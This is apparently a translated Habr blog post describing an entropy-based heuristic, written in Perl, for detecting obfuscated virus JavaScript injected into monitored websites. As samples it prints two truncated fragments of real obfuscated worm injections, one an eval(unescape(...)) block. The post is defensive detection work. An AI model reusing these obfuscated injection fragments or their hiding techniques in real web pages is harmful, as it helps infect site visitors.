
On a heuristic method for detecting viral injections on sites

! This post was written by RomanL, but since he does not have the required amount of karma, he cannot publish it himself.

I want to talk about one way to detect polymorphic viral JavaScript code injected into website pages. This note is aimed at experienced users who don't need the basics explained and who can find additional information themselves without links to Wikipedia :)


Introduction


Surely many of you have run into unpleasant browser warnings that a site poses a potential danger to your computer. And once Yandex began showing such warnings in its search results, it became very easy to explain why a site's traffic had suddenly dropped to zero. Easy, but too late.

The culprits are malicious worms that infect web pages, try to get into the visitor's computer through browser vulnerabilities, and go on to spread further.

A worm of this type usually acts as follows:

What kind of viral code ends up on a site?


There are usually several options:

How can you quickly find out that viral code has made its way onto a site?



I would like to briefly describe some features of the second approach and how we use it at our company.

Task.


The task is simple: monitor two hundred client websites for the appearance of viral code.

Solution.


We wrote a crawler that periodically polls the sites on the list, fetches each main page, and analyzes it for potential danger.
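A crawler of this kind could be sketched roughly as follows. This is only an illustration and not our production code: the names poll_sites, $analyze and $fetch, the example URLs, and the trivial analyzer are all invented for the sketch. The default fetcher relies on the core HTTP::Tiny module, and the periodic part is assumed to be handled from outside (for example, by cron).

```perl
use strict;
use warnings;
use HTTP::Tiny;

# Hypothetical helper: fetch the main page of every site on the list and
# hand the HTML to an analyzer callback. Returns a hash ref: url => verdict.
sub poll_sites {
    my ($urls, $analyze, $fetch) = @_;

    # Default fetcher (assumption): plain GET via HTTP::Tiny.
    # A stub can be passed instead, e.g. to run without network access.
    $fetch ||= do {
        my $http = HTTP::Tiny->new(timeout => 10);
        sub {
            my $res = $http->get($_[0]);
            return $res->{success} ? $res->{content} : undef;
        };
    };

    my %report;
    for my $url (@$urls) {
        my $html = $fetch->($url);
        $report{$url} = defined $html ? $analyze->($html) : 'unreachable';
    }
    return \%report;
}

# Usage with a stub fetcher and a made-up one-line analyzer.
my %pages = (
    'http://client-a.example/' => '<html><body>Hello</body></html>',
    'http://client-b.example/' => '<script>eval(unescape("%76%61%72"))</script>',
);
my @urls = (
    'http://client-a.example/',
    'http://client-b.example/',
    'http://client-c.example/',    # not in %pages, so the stub returns undef
);
my $report = poll_sites(
    \@urls,
    sub { $_[0] =~ /eval\s*\(\s*unescape/ ? 'suspicious' : 'clean' },
    sub { $pages{ $_[0] } },
);
print "$_: $report->{$_}\n" for sort keys %$report;
```

Passing the fetcher and the analyzer as callbacks keeps the polling loop independent of how pages are downloaded and how they are judged, so either part can be swapped out.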

The search for potentially dangerous code goes in several steps:

And there's more!


Recently, new worm variants have begun using polymorphic encryption (more precisely, obfuscation) of the JS code they insert into pages, in order to hide the logic the script executes. Such code is hard to catch in time with the signature method because it changes from copy to copy (although some fragments can be described with regular expressions in the signature database). Here are fragments of the bodies of some injections of this kind:
var jGt7H3IkS = Array ( 63 , 6 , 19 , 54 , 61 , 31 , 22 , 51 , 12 , 33 , 0 , 0 , 0 , 0 , 0 , 0 , 49 , 5 , 4 , 62 , 2 , 25 , 29 , 38 , 39
, 44 , 26 , 28 , 42 , 57 , 21 , 34 , 13 , 7 , 56 , 43 , 41 , 47 , 1 , 3 , 37 , 40 , 11 , 0 , 0 , 0 , 0 , 30 , 0 , 14 , 58 , 17 , 27 , 0 , 8 ,
60 , 16 , 36 , 35 , 20 , 46 , 24 , 48 , 10 , 32 , 9 , 15 , 23 , 52 , 53 , 59 , 50 , 55 , 45 , 18 ) , OmFORSBhopxKumqErMdN3
QYTiogrWyNLb2agSAc = "Ewgns28wesYusd8GQ3Ktcs4HoLmts2gnWSInoUgO1S8wo_m96QPxqW8GQ1876sFwB74HZSgwe5R
GELf7W5P @ fWgG " , JjrjMmsvdcJ8K6muubIPn = 0 , CCdH_4HW = 0 , Lv0RDYvi6cLNHfJ = 0 , EnMfvr1feyNJmFLN6C0pI
DRx7SSTALRmlVGS , KuX2VtJp1ALLHMe = OmFORSBhopxKumqErMdN3QYTiogrWyNLb2agSAc. length , K0

(function(t){eval(unescape(('%76ar%20a%3d%22Sc%72%69p%74Engine%22%2cb%3d%22%56er%73i%6fn()
%2b%22%2cj%3d%22%22%2cu%3dna%76igator%2euse%72Agent%3bif((u%2e%69nd%65xOf(%22W%69n%22)%3e0)%26%26
(u%2eindexOf(%22%4eT%206%22)%3c0)%26%26(documen%74%2e%63ooki%65%2ein%64%65xOf(%22%6d%69ek%3d1%22%29%3c0)
%26%26%28typeof(zr%76zts)%21%3d%74%79peof%28%22%41%22)%29)%7bz%72v%7ats%3d%22%41%22%3b%65
val(%22%69f%28%77indow%2e%22+a%2b%22)j%3dj+

Analyzing obfuscated injections like these led us to a hypothesis: such code has high entropy, i.e. compared with ordinary JS code, obfuscated code is chaotic.

Next, we tried several modifications of the algorithm for calculating the final entropy of such code and ran them against a small signature database. The results were encouraging, but with one unpleasant catch: viral code packed with the algorithms used to pack libraries such as jQuery showed entropy values close to those of the libraries themselves. After some head-scratching and a bit more tinkering with the algorithm, we decided to add such code to the signature database and to set the entropy threshold so that it confidently detects the virus modifications shown above.
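For the signature side, a check against a database of regular expressions might look something like the sketch below. The two patterns and the names %SIGNATURES and match_signatures are invented for illustration; they are not entries from our actual database.

```perl
use strict;
use warnings;

# Hypothetical signature database: name => compiled pattern.
my %SIGNATURES = (
    # eval(unescape(... wrapper around an escaped payload
    eval_unescape  => qr/eval\s*\(\s*unescape\s*\(/i,
    # Array( followed by a long run of integers (a lookup table)
    long_int_array => qr/Array\s*\((?:\s*\d+\s*,){10,}/,
);

# Returns the names of all signatures found in the code, sorted by name.
sub match_signatures {
    my ($code) = @_;
    my @hits = grep { $code =~ $SIGNATURES{$_} } sort keys %SIGNATURES;
    return @hits;
}

# Usage on a few made-up inputs.
for my $code (
    "(function(t){eval(unescape(('%76ar%20a')))})",
    'var a = Array(' . join(',', 1 .. 30) . ');',
    'function add(a, b) { return a + b; }',
) {
    my @hits = match_signatures($code);
    print @hits ? "matched: @hits\n" : "no match\n";
}
```

Code that slips past every signature is what the entropy check is meant to catch.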
Here is the small piece of code that calculates an entropy measure for slightly preprocessed JS code:
sub enthropy($$) {
    my $data   = shift;    # JS code to analyze
    my $ignore = shift;    # array ref of regexes to strip before measuring
    my $e = 0;

    my $letters = {};      # 3-character chunk => number of occurrences
    my $counter = 0;       # total number of chunks

    if ($data) {
        # lowercase and remove all whitespace
        $data =~ tr/A-Z/a-z/;
        $data =~ s/\s//g;

        # clearing polymorphic code from ignored signatures
        foreach (@{$ignore}) {
            $data =~ s/$_//g;
        }

        # replace everything except the digits 2-9 with "_"
        $data =~ s/[^2-9]/_/g;

        # count consecutive 3-character chunks
        while ($data =~ /(...)/g) {
            $letters->{$1}++;
            $counter++;
        }

        # Shannon entropy over the chunk frequencies
        foreach (keys(%{$letters})) {
            my $p = $letters->{$_} / $counter;
            $e += $p * log2($p);
        }

        $e = 0 - $e;
    }

    return $e;
}

# base-2 logarithm; the prototype takes one scalar argument
sub log2($) {
    my $n = shift;
    return log($n) / log(2);
}

What's going on here:

After some experimenting, we settled on a threshold for the resulting value, above which the code is considered viral:

our $E_MAX = 2.2;
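
To show how the threshold might be applied, here is a compact, self-contained sketch. The names trigram_entropy and is_suspicious and both test strings are made up for the illustration; the measure itself is only a condensed restatement of the steps above and assumes the ignore list is an array reference of regexes.

```perl
use strict;
use warnings;

our $E_MAX = 2.2;    # threshold from the article

# Condensed restatement of the measure: lowercase, strip whitespace,
# drop ignored signatures, map everything except digits 2-9 to "_",
# then take the Shannon entropy of consecutive 3-character chunks.
sub trigram_entropy {
    my ($data, $ignore) = @_;
    return 0 unless defined $data && length $data;

    $data = lc $data;
    $data =~ s/\s//g;
    $data =~ s/$_//g for @{ $ignore || [] };
    $data =~ s/[^2-9]/_/g;

    my (%count, $total);
    while ($data =~ /(...)/g) {
        $count{$1}++;
        $total++;
    }
    return 0 unless $total;

    my $e = 0;
    for my $n (values %count) {
        my $p = $n / $total;
        $e -= $p * log($p) / log(2);
    }
    return $e;
}

# Hypothetical wrapper: 1 if the measure exceeds the threshold, else 0.
sub is_suspicious {
    my ($code, $ignore) = @_;
    return trigram_entropy($code, $ignore) > $E_MAX ? 1 : 0;
}

# Made-up inputs: ordinary code and a percent-escaped fragment.
my $plain   = 'function add(a, b) { return a + b; }';
my $escaped = '%76%61%72%20%61%3d%22%53%63%72%69%70%74';

printf "plain:   %.2f suspicious=%d\n", trigram_entropy($plain),   is_suspicious($plain);
printf "escaped: %.2f suspicious=%d\n", trigram_entropy($escaped), is_suspicious($escaped);
```

Ordinary code with no digits from 2 to 9 collapses into identical "___" chunks and scores zero, while the escaped fragment produces many different chunks and lands above the threshold.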

That is really all I wanted to say about one method of heuristic detection of viral injections on sites. :)
P.S. By the way, if you save FTP passwords in Far, don't keep them at the root of the FTP panel; create directories (via F7) instead. For some reason, viruses don't yet know how to read them from there :)

P.P.S. If you liked the article, give a plus to RomanL; if you didn't, give a minus to zvirusz.

Source: https://habr.com/ru/post/70615/

